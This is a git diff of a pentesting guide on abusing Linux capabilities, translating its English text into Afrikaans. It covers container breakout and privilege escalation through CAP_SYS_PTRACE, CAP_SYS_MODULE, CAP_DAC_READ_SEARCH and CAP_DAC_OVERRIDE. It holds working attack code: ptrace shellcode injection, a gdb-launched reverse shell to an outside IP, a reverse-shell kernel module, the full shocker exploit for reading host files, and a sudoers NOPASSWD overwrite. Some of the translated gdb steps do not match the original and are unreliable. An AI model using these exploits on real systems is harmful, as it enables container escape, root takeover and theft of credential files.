ctypes.c_ulonglong), - ("rdi", ctypes.c_ulonglong), - ("orig_rax", ctypes.c_ulonglong), - ("rip", ctypes.c_ulonglong), - ("cs", ctypes.c_ulonglong), - ("eflags", ctypes.c_ulonglong), - ("rsp", ctypes.c_ulonglong), - ("ss", ctypes.c_ulonglong), - ("fs_base", ctypes.c_ulonglong), - ("gs_base", ctypes.c_ulonglong), - ("ds", ctypes.c_ulonglong), - ("es", ctypes.c_ulonglong), - ("fs", ctypes.c_ulonglong), - ("gs", ctypes.c_ulonglong), - ] +_fields_ = [ +("r15", ctypes.c_ulonglong), +("r14", ctypes.c_ulonglong), +("r13", ctypes.c_ulonglong), +("r12", ctypes.c_ulonglong), +("rbp", ctypes.c_ulonglong), +("rbx", ctypes.c_ulonglong), +("r11", ctypes.c_ulonglong), +("r10", ctypes.c_ulonglong), +("r9", ctypes.c_ulonglong), +("r8", ctypes.c_ulonglong), +("rax", ctypes.c_ulonglong), +("rcx", ctypes.c_ulonglong), +("rdx", ctypes.c_ulonglong), +("rsi", ctypes.c_ulonglong), +("rdi", ctypes.c_ulonglong), +("orig_rax", ctypes.c_ulonglong), +("rip", ctypes.c_ulonglong), +("cs", ctypes.c_ulonglong), +("eflags", ctypes.c_ulonglong), +("rsp", ctypes.c_ulonglong), +("ss", ctypes.c_ulonglong), +("fs_base", ctypes.c_ulonglong), +("gs_base", ctypes.c_ulonglong), +("ds", ctypes.c_ulonglong), +("es", ctypes.c_ulonglong), +("fs", ctypes.c_ulonglong), +("gs", ctypes.c_ulonglong), +] libc = ctypes.CDLL("libc.so.6") @@ -586,13 +557,13 @@ shellcode = "\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5 # Inject the shellcode into the running process byte by byte. for i in xrange(0,len(shellcode),4): - # Convert the byte to little endian. - shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16) - shellcode_byte_little_endian=struct.pack(" ``` -Debug a root process with gdb ad copy-paste the previously generated gdb lines: +Voer die volgende gdb-opdragte in: +```bash +(gdb) set follow-fork-mode child +(gdb) set detach-on-fork off +(gdb) catch exec +(gdb) run +``` + +Wag totdat die proses uitgevoer word en dan voer die volgende gdb-opdragte in: + +```bash +(gdb) set follow-fork-mode parent +(gdb) set detach-on-fork on +(gdb) catch exec +(gdb) continue +``` + +Dit sal jou in staat stel om die root-proses te foutopspoor met gdb. ```bash # In this case there was a sleep run by root ## NOTE that the process you abuse will die after the shellcode @@ -663,117 +658,100 @@ Continuing. process 207009 is executing new program: /usr/bin/dash [...] ``` +**Voorbeeld met omgewing (Docker-ontsnapping) - Nog 'n gdb-misbruik** -**Example with environment (Docker breakout) - Another gdb Abuse** - -If **GDB** is installed (or you can install it with `apk add gdb` or `apt install gdb` for example) you can **debug a process from the host** and make it call the `system` function. (This technique also requires the capability `SYS_ADMIN`)**.** - +As **GDB** geïnstalleer is (of jy kan dit installeer met `apk add gdb` of `apt install gdb` byvoorbeeld), kan jy **'n proses vanaf die gasheer af ontleed** en dit die `system`-funksie laat aanroep. (Hierdie tegniek vereis ook die vermoë `SYS_ADMIN`). ```bash gdb -p 1234 (gdb) call (void)system("ls") (gdb) call (void)system("sleep 5") (gdb) call (void)system("bash -c 'bash -i >& /dev/tcp/192.168.115.135/5656 0>&1'") ``` - -You won’t be able to see the output of the command executed but it will be executed by that process (so get a rev shell). +Jy sal nie die uitset van die uitgevoerde bevel kan sien nie, maar dit sal deur daardie proses uitgevoer word (so kry 'n omgekeerde dop). {% hint style="warning" %} -If you get the error "No symbol "system" in current context." check the previous example loading a shellcode in a program via gdb. +As jy die fout "No symbol "system" in current context." kry, kyk na die vorige voorbeeld waar 'n skulpkode in 'n program gelaai word via gdb. {% endhint %} -**Example with environment (Docker breakout) - Shellcode Injection** - -You can check the enabled capabilities inside the docker container using: +**Voorbeeld met omgewing (Docker-ontsnapping) - Skulpkode-inspuiting** +Jy kan die geaktiveerde vermoëns binne die docker-houer nagaan deur die volgende te gebruik: ```bash capsh --print Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap+ep Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root ``` +Lys **prosesse** wat op die **gasheer** loop `ps -eaf` -List **processes** running in the **host** `ps -eaf` - -1. Get the **architecture** `uname -m` -2. Find a **shellcode** for the architecture ([https://www.exploit-db.com/exploits/41128](https://www.exploit-db.com/exploits/41128)) -3. Find a **program** to **inject** the **shellcode** into a process memory ([https://github.com/0x00pf/0x00sec\_code/blob/master/mem\_inject/infect.c](https://github.com/0x00pf/0x00sec\_code/blob/master/mem\_inject/infect.c)) -4. **Modify** the **shellcode** inside the program and **compile** it `gcc inject.c -o inject` -5. **Inject** it and grab your **shell**: `./inject 299; nc 172.17.0.1 5600` +1. Kry die **argitektuur** `uname -m` +2. Vind 'n **shellcode** vir die argitektuur ([https://www.exploit-db.com/exploits/41128](https://www.exploit-db.com/exploits/41128)) +3. Vind 'n **program** om die **shellcode** in 'n proses se geheue in te spuit ([https://github.com/0x00pf/0x00sec\_code/blob/master/mem\_inject/infect.c](https://github.com/0x00pf/0x00sec\_code/blob/master/mem\_inject/infect.c)) +4. **Wysig** die **shellcode** binne die program en **kompileer** dit `gcc inject.c -o inject` +5. **Spuit** dit in en gryp jou **shell**: `./inject 299; nc 172.17.0.1 5600` ## CAP\_SYS\_MODULE -**[`CAP_SYS_MODULE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** empowers a process to **load and unload kernel modules (`init_module(2)`, `finit_module(2)` and `delete_module(2)` system calls)**, offering direct access to the kernel's core operations. This capability presents critical security risks, as it enables privilege escalation and total system compromise by allowing modifications to the kernel, thereby bypassing all Linux security mechanisms, including Linux Security Modules and container isolation. -**This means that you can** **insert/remove kernel modules in/from the kernel of the host machine.** +**[`CAP_SYS_MODULE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** gee 'n proses die mag om kernel modules te **laai en te verwyder (`init_module(2)`, `finit_module(2)` en `delete_module(2)` stelseloproepe)**, wat direkte toegang tot die kern van die kernel bied. Hierdie vermoë bied kritieke sekuriteitsrisiko's, aangesien dit bevoorregte eskalasie en totale stelselkompromieë moontlik maak deur wysigings aan die kernel toe te laat, en sodoende alle Linux-sekuriteitsmeganismes, insluitend Linux-sekuriteitsmodules en houer-isolasie, te omseil. +**Dit beteken dat jy kernel modules in die kernel van die gasheer masjien kan invoeg/verwyder.** -**Example with binary** - -In the following example the binary **`python`** has this capability. +**Voorbeeld met binêre** +In die volgende voorbeeld het die binêre **`python`** hierdie vermoë. ```bash getcap -r / 2>/dev/null /usr/bin/python2.7 = cap_sys_module+ep ``` - -By default, **`modprobe`** command checks for dependency list and map files in the directory **`/lib/modules/$(uname -r)`**.\ -In order to abuse this, lets create a fake **lib/modules** folder: - +Standaard, **`modprobe`** opdrag kontroleer vir afhanklikheidlys en kaartlêers in die gids **`/lib/modules/$(uname -r)`**.\ +Om hiervan misbruik te maak, skep ons 'n vals **lib/modules**-gids: ```bash mkdir lib/modules -p cp -a /lib/modules/5.0.0-20-generic/ lib/modules/$(uname -r) ``` - -Then **compile the kernel module you can find 2 examples below and copy** it to this folder: - +Dan **kompileer die kernel module wat jy hieronder kan vind en kopieer** dit na hierdie folder: ```bash cp reverse-shell.ko lib/modules/$(uname -r)/ ``` - -Finally, execute the needed python code to load this kernel module: - +Uiteindelik, voer die nodige Python-kode uit om hierdie kernel-module te laai: ```python import kmod km = kmod.Kmod() km.set_mod_dir("/path/to/fake/lib/modules/5.0.0-20-generic/") km.modprobe("reverse-shell") ``` +**Voorbeeld 2 met binêre** -**Example 2 with binary** - -In the following example the binary **`kmod`** has this capability. - +In die volgende voorbeeld het die binêre **`kmod`** hierdie vermoë. ```bash getcap -r / 2>/dev/null /bin/kmod = cap_sys_module+ep ``` +Dit beteken dat dit moontlik is om die opdrag **`insmod`** te gebruik om 'n kernel-module in te voeg. Volg die voorbeeld hieronder om 'n **omgekeerde skulp** te kry deur van hierdie voorreg misbruik te maak. -Which means that it's possible to use the command **`insmod`** to insert a kernel module. Follow the example below to get a **reverse shell** abusing this privilege. - -**Example with environment (Docker breakout)** - -You can check the enabled capabilities inside the docker container using: +**Voorbeeld met omgewing (Docker-ontsnapping)** +Jy kan die geaktiveerde vermoëns binne die Docker-houer nagaan deur die volgende te gebruik: ```bash capsh --print Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) ``` +Binne die vorige uitset kan jy sien dat die **SYS\_MODULE** vermoë geaktiveer is. -Inside the previous output you can see that the **SYS\_MODULE** capability is enabled. - -**Create** the **kernel module** that is going to execute a reverse shell and the **Makefile** to **compile** it: +**Skep** die **kernel module** wat 'n omgekeerde skulp sal uitvoer en die **Makefile** om dit te **kompileer**: {% code title="reverse-shell.c" %} ```c @@ -789,45 +767,40 @@ static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/ // call_usermodehelper function is used to create user mode processes from kernel space static int __init reverse_shell_init(void) { - return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); +return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); } static void __exit reverse_shell_exit(void) { - printk(KERN_INFO "Exiting\n"); +printk(KERN_INFO "Exiting\n"); } module_init(reverse_shell_init); module_exit(reverse_shell_exit); ``` -{% endcode %} - {% code title="Makefile" %} ```bash obj-m +=reverse-shell.o all: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules +make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean +make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean ``` {% endcode %} {% hint style="warning" %} -The blank char before each make word in the Makefile **must be a tab, not spaces**! +Die leë karakter voor elke woord in die Makefile **moet 'n tab wees, nie spasies nie**! {% endhint %} -Execute `make` to compile it. - +Voer `make` uit om dit te kompileer. ``` ake[1]: *** /lib/modules/5.10.0-kali7-amd64/build: No such file or directory. Stop. sudo apt update sudo apt full-upgrade ``` - -Finally, start `nc` inside a shell and **load the module** from another one and you will capture the shell in the nc process: - +Uiteindelik, begin `nc` binne 'n skulp en **laai die module** vanuit 'n ander skulp en jy sal die skulp in die nc-proses vasvang: ```bash #Shell 1 nc -lvnp 4444 @@ -835,67 +808,57 @@ nc -lvnp 4444 #Shell 2 insmod reverse-shell.ko #Launch the reverse shell ``` +**Die kode van hierdie tegniek is gekopieer uit die laboratorium van "Misbruik van SYS\_MODULE-vermoë" van** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) -**The code of this technique was copied from the laboratory of "Abusing SYS\_MODULE Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) - -Another example of this technique can be found in [https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host](https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host) +'n Ander voorbeeld van hierdie tegniek kan gevind word by [https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host](https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host) ## CAP\_DAC\_READ\_SEARCH -[**CAP\_DAC\_READ\_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) enables a process to **bypass permissions for reading files and for reading and executing directories**. Its primary use is for file searching or reading purposes. However, it also allows a process to use the `open_by_handle_at(2)` function, which can access any file, including those outside the process's mount namespace. The handle used in `open_by_handle_at(2)` is supposed to be a non-transparent identifier obtained through `name_to_handle_at(2)`, but it can include sensitive information like inode numbers that are vulnerable to tampering. The potential for exploitation of this capability, particularly in the context of Docker containers, was demonstrated by Sebastian Krahmer with the shocker exploit, as analyzed [here](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3). -**This means that you can** **bypass can bypass file read permission checks and directory read/execute permission checks.** +[**CAP\_DAC\_READ\_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) stel 'n proses in staat om **om versperrings vir lees van lêers en lees en uitvoer van gide te omseil**. Dit word hoofsaaklik gebruik vir lêersoek- of leesdoeleindes. Dit stel egter ook 'n proses in staat om die `open_by_handle_at(2)`-funksie te gebruik, wat enige lêer kan benader, insluitend dié buite die proses se bergingsnaamruimte. Die handvatsel wat in `open_by_handle_at(2)` gebruik word, behoort 'n nie-deursigtige identifiseerder te wees wat verkry word deur `name_to_handle_at(2)`, maar dit kan sensitiewe inligting soos inode-nommers insluit wat vatbaar is vir manipulasie. Die potensiaal vir uitbuiting van hierdie vermoë, veral in die konteks van Docker-houers, is gedemonstreer deur Sebastian Krahmer met die shocker-uitbuiting, soos geanaliseer [hier](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3). +**Dit beteken dat jy versperrings vir lêerleestoestemming en gidslees-/uitvoertoestemming kan omseil.** -**Example with binary** - -The binary will be able to read any file. So, if a file like tar has this capability it will be able to read the shadow file: +**Voorbeeld met binêre** +Die binêre sal enige lêer kan lees. So, as 'n lêer soos tar hierdie vermoë het, sal dit die shadow-lêer kan lees: ```bash cd /etc tar -czf /tmp/shadow.tar.gz shadow #Compress show file in /tmp cd /tmp tar -cxf shadow.tar.gz ``` +**Voorbeeld met binary2** -**Example with binary2** - -In this case lets suppose that **`python`** binary has this capability. In order to list root files you could do: - +In hierdie geval stel ons voor dat die **`python`** binêre lêer hierdie vermoë het. Om roetebestande te lys, kan jy die volgende doen: ```python import os for r, d, f in os.walk('/root'): - for filename in f: - print(filename) +for filename in f: +print(filename) ``` - -And in order to read a file you could do: - +En om 'n lêer te lees, kan jy die volgende doen: ```python print(open("/etc/shadow", "r").read()) ``` +**Voorbeeld in omgewing (Docker-ontsnapping)** -**Example in Environment (Docker breakout)** - -You can check the enabled capabilities inside the docker container using: - +Jy kan die geaktiveerde vermoëns binne die Docker-houer nagaan deur die volgende te gebruik: ``` capsh --print Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) ``` +Binne die vorige uitset kan jy sien dat die **DAC\_READ\_SEARCH** vermoë geaktiveer is. As gevolg hiervan kan die houer **prosesse ontleed**. -Inside the previous output you can see that the **DAC\_READ\_SEARCH** capability is enabled. As a result, the container can **debug processes**. - -You can learn how the following exploiting works in [https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3) but in resume **CAP\_DAC\_READ\_SEARCH** not only allows us to traverse the file system without permission checks, but also explicitly removes any checks to _**open\_by\_handle\_at(2)**_ and **could allow our process to sensitive files opened by other processes**. - -The original exploit that abuse this permissions to read files from the host can be found here: [http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c), the following is a **modified version that allows you to indicate the file you want to read as first argument and dump it in a file.** +Jy kan leer hoe die volgende uitbuiting werk by [https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3), maar in opsomming **CAP\_DAC\_READ\_SEARCH** laat ons nie net toe om deur die lêersisteem te beweeg sonder toestemmingskontroles nie, maar verwyder ook uitdruklik enige kontroles vir _**open\_by\_handle\_at(2)**_ en **kan ons proses toelaat om sensitiewe lêers wat deur ander prosesse geopen is, te benader**. +Die oorspronklike uitbuiting wat hierdie vermoëns misbruik om lêers vanaf die gasheer te lees, kan hier gevind word: [http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c), die volgende is 'n **aangepaste weergawe wat jou in staat stel om die lêer wat jy wil lees as die eerste argument aan te dui en dit in 'n lêer te stort**. ```c #include #include @@ -912,203 +875,195 @@ The original exploit that abuse this permissions to read files from the host can // ./socker /etc/shadow shadow #Read /etc/shadow from host and save result in shadow file in current dir struct my_file_handle { - unsigned int handle_bytes; - int handle_type; - unsigned char f_handle[8]; +unsigned int handle_bytes; +int handle_type; +unsigned char f_handle[8]; }; void die(const char *msg) { - perror(msg); - exit(errno); +perror(msg); +exit(errno); } void dump_handle(const struct my_file_handle *h) { - fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes, - h->handle_type); - for (int i = 0; i < h->handle_bytes; ++i) { - fprintf(stderr,"0x%02x", h->f_handle[i]); - if ((i + 1) % 20 == 0) - fprintf(stderr,"\n"); - if (i < h->handle_bytes - 1) - fprintf(stderr,", "); - } - fprintf(stderr,"};\n"); +fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes, +h->handle_type); +for (int i = 0; i < h->handle_bytes; ++i) { +fprintf(stderr,"0x%02x", h->f_handle[i]); +if ((i + 1) % 20 == 0) +fprintf(stderr,"\n"); +if (i < h->handle_bytes - 1) +fprintf(stderr,", "); +} +fprintf(stderr,"};\n"); } int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh) { - int fd; - uint32_t ino = 0; - struct my_file_handle outh = { - .handle_bytes = 8, - .handle_type = 1 - }; - DIR *dir = NULL; - struct dirent *de = NULL; - path = strchr(path, '/'); - // recursion stops if path has been resolved - if (!path) { - memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle)); - oh->handle_type = 1; - oh->handle_bytes = 8; - return 1; - } +int fd; +uint32_t ino = 0; +struct my_file_handle outh = { +.handle_bytes = 8, +.handle_type = 1 +}; +DIR *dir = NULL; +struct dirent *de = NULL; +path = strchr(path, '/'); +// recursion stops if path has been resolved +if (!path) { +memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle)); +oh->handle_type = 1; +oh->handle_bytes = 8; +return 1; +} - ++path; - fprintf(stderr, "[*] Resolving '%s'\n", path); - if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0) - die("[-] open_by_handle_at"); - if ((dir = fdopendir(fd)) == NULL) - die("[-] fdopendir"); - for (;;) { - de = readdir(dir); - if (!de) - break; - fprintf(stderr, "[*] Found %s\n", de->d_name); - if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) { - fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino); - ino = de->d_ino; - break; - } - } +++path; +fprintf(stderr, "[*] Resolving '%s'\n", path); +if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0) +die("[-] open_by_handle_at"); +if ((dir = fdopendir(fd)) == NULL) +die("[-] fdopendir"); +for (;;) { +de = readdir(dir); +if (!de) +break; +fprintf(stderr, "[*] Found %s\n", de->d_name); +if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) { +fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino); +ino = de->d_ino; +break; +} +} - fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); - if (de) { - for (uint32_t i = 0; i < 0xffffffff; ++i) { - outh.handle_bytes = 8; - outh.handle_type = 1; - memcpy(outh.f_handle, &ino, sizeof(ino)); - memcpy(outh.f_handle + 4, &i, sizeof(i)); - if ((i % (1<<20)) == 0) - fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i); - if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) { - closedir(dir); - close(fd); - dump_handle(&outh); - return find_handle(bfd, path, &outh, oh); - } - } - } - closedir(dir); - close(fd); - return 0; +fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); +if (de) { +for (uint32_t i = 0; i < 0xffffffff; ++i) { +outh.handle_bytes = 8; +outh.handle_type = 1; +memcpy(outh.f_handle, &ino, sizeof(ino)); +memcpy(outh.f_handle + 4, &i, sizeof(i)); +if ((i % (1<<20)) == 0) +fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i); +if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) { +closedir(dir); +close(fd); +dump_handle(&outh); +return find_handle(bfd, path, &outh, oh); +} +} +} +closedir(dir); +close(fd); +return 0; } int main(int argc,char* argv[] ) { - char buf[0x1000]; - int fd1, fd2; - struct my_file_handle h; - struct my_file_handle root_h = { - .handle_bytes = 8, - .handle_type = 1, - .f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0} - }; - - fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" - "[***] The tea from the 90's kicks your sekurity again. [***]\n" - "[***] If you have pending sec consulting, I'll happily [***]\n" - "[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); - - read(0, buf, 1); - - // get a FS reference from something mounted in from outside - if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) - die("[-] open"); - - if (find_handle(fd1, argv[1], &root_h, &h) <= 0) - die("[-] Cannot find valid handle!"); - - fprintf(stderr, "[!] Got a final handle!\n"); - dump_handle(&h); - - if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0) - die("[-] open_by_handle"); - - memset(buf, 0, sizeof(buf)); - if (read(fd2, buf, sizeof(buf) - 1) < 0) - die("[-] read"); - - printf("Success!!\n"); - - FILE *fptr; - fptr = fopen(argv[2], "w"); - fprintf(fptr,"%s", buf); - fclose(fptr); - - close(fd2); close(fd1); - - return 0; +char buf[0x1000]; +int fd1, fd2; +struct my_file_handle h; +struct my_file_handle root_h = { +.handle_bytes = 8, +.handle_type = 1, +.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0} +}; + +fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" +"[***] The tea from the 90's kicks your sekurity again. [***]\n" +"[***] If you have pending sec consulting, I'll happily [***]\n" +"[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); + +read(0, buf, 1); + +// get a FS reference from something mounted in from outside +if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) +die("[-] open"); + +if (find_handle(fd1, argv[1], &root_h, &h) <= 0) +die("[-] Cannot find valid handle!"); + +fprintf(stderr, "[!] Got a final handle!\n"); +dump_handle(&h); + +if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0) +die("[-] open_by_handle"); + +memset(buf, 0, sizeof(buf)); +if (read(fd2, buf, sizeof(buf) - 1) < 0) +die("[-] read"); + +printf("Success!!\n"); + +FILE *fptr; +fptr = fopen(argv[2], "w"); +fprintf(fptr,"%s", buf); +fclose(fptr); + +close(fd2); close(fd1); + +return 0; } ``` - {% hint style="warning" %} -The exploit needs to find a pointer to something mounted on the host. The original exploit used the file /.dockerinit and this modified version uses /etc/hostname. If the exploit isn't working maybe you need to set a different file. To find a file that is mounted in the host just execute mount command: +Die uitbuiting moet 'n verwysing na iets vind wat op die gasheer gemonteer is. Die oorspronklike uitbuiting het die lêer /.dockerinit gebruik en hierdie aangepaste weergawe gebruik /etc/hostname. As die uitbuiting nie werk nie, moet jy dalk 'n ander lêer instel. Om 'n lêer te vind wat op die gasheer gemonteer is, voer jy net die mount-opdrag uit: {% endhint %} ![](<../../.gitbook/assets/image (407) (1).png>) -**The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) +**Die kode van hierdie tegniek is gekopieer uit die laboratorium van "Misbruik van die DAC\_READ\_SEARCH-vermoë" van** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) ​
-​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidgebeurtenis in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %} ## CAP\_DAC\_OVERRIDE -**This mean that you can bypass write permission checks on any file, so you can write any file.** +**Dit beteken dat jy skryftoestemmingskontroles vir enige lêer kan omseil, sodat jy enige lêer kan skryf.** -There are a lot of files you can **overwrite to escalate privileges,** [**you can get ideas from here**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges). +Daar is baie lêers wat jy kan **oorweldig om voorregte te verhoog,** [**jy kan idees hier kry**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges). -**Example with binary** - -In this example vim has this capability, so you can modify any file like _passwd_, _sudoers_ or _shadow_: +**Voorbeeld met binêre** +In hierdie voorbeeld het vim hierdie vermoë, sodat jy enige lêer soos _passwd_, _sudoers_ of _shadow_ kan wysig: ```bash getcap -r / 2>/dev/null /usr/bin/vim = cap_dac_override+ep vim /etc/sudoers #To overwrite it ``` +**Voorbeeld met binêre nommer 2** -**Example with binary 2** - -In this example **`python`** binary will have this capability. You could use python to override any file: - +In hierdie voorbeeld sal die **`python`** binêre nommer hierdie vermoë hê. Jy kan python gebruik om enige lêer te oorskryf: ```python file=open("/etc/sudoers","a") file.write("yourusername ALL=(ALL) NOPASSWD:ALL") file.close() ``` +**Voorbeeld met omgewing + CAP_DAC_READ_SEARCH (Docker-ontsnapping)** -**Example with environment + CAP\_DAC\_READ\_SEARCH (Docker breakout)** - -You can check the enabled capabilities inside the docker container using: - +Jy kan die geaktiveerde vermoëns binne die Docker-houer nagaan deur die volgende te gebruik: ```bash capsh --print Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) ``` - -First of all read the previous section that [**abuses DAC\_READ\_SEARCH capability to read arbitrary files**](linux-capabilities.md#cap\_dac\_read\_search) of the host and **compile** the exploit.\ -Then, **compile the following version of the shocker exploit** that will allow you to **write arbitrary files** inside the hosts filesystem: - +Eerstens lees die vorige afdeling wat [**misbruik maak van die DAC\_READ\_SEARCH-vermoë om willekeurige lêers te lees**](linux-capabilities.md#cap\_dac\_read\_search) van die gasheer en **kompileer** die uitbuiting.\ +Daarna, **kompileer die volgende weergawe van die shocker-uitbuiting** wat jou sal toelaat om **willekeurige lêers te skryf** binne die gasheer se lêersisteem: ```c #include #include @@ -1122,182 +1077,172 @@ Then, **compile the following version of the shocker exploit** that will allow y #include // gcc shocker_write.c -o shocker_write -// ./shocker_write /etc/passwd passwd +// ./shocker_write /etc/passwd passwd struct my_file_handle { - unsigned int handle_bytes; - int handle_type; - unsigned char f_handle[8]; +unsigned int handle_bytes; +int handle_type; +unsigned char f_handle[8]; }; void die(const char * msg) { - perror(msg); - exit(errno); +perror(msg); +exit(errno); } void dump_handle(const struct my_file_handle * h) { - fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h -> handle_bytes, - h -> handle_type); - for (int i = 0; i < h -> handle_bytes; ++i) { - fprintf(stderr, "0x%02x", h -> f_handle[i]); - if ((i + 1) % 20 == 0) - fprintf(stderr, "\n"); - if (i < h -> handle_bytes - 1) - fprintf(stderr, ", "); - } - fprintf(stderr, 